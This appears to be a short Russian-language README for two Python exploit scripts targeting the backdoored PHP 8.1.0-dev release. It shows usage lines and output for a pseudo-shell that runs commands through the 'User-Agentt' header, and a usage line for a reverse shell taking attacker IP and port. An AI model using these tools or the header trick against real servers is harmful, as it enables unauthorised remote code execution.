
PHP 8.1.0-dev Backdoor System Shell Script
Скрипт системной оболочки для бэкдора PHP 8.1.0-dev

Версия PHP 8.1.0-dev была выпущена с бэкдором 28 марта 2021 года, но бэкдор был быстро обнаружен и удалён. Если эта версия PHP работает на сервере, злоумышленник может выполнить произвольный код, отправив заголовок User-Agentt.
После обнаружения проблемы исходный код был восстановлен, но затем его снова модифицировали. Взлом мог создать бэкдор на любых сайтах, где работала скомпрометированная версия PHP, что позволяло хакерам выполнять удалённый код на сайте.
Читать полную статью: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
Этот короткий эксплойт-скрипт backdoor_php_8.1.0-dev.py использует бэкдор для предоставления псевдо-системной оболочки на хосте. Найдите его на Exploit DB.
Использование:
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
Enter the host url:
http://a.b.c.d
Interactive shell is opened on http://a.b.c.d
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
Этот короткий эксплойт-скрипт revshell_php_8.1.0-dev.py предоставляет обратную оболочку на целевой системе.
Использование:
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

Будьте любознательными, обучение — это жизнь! 😃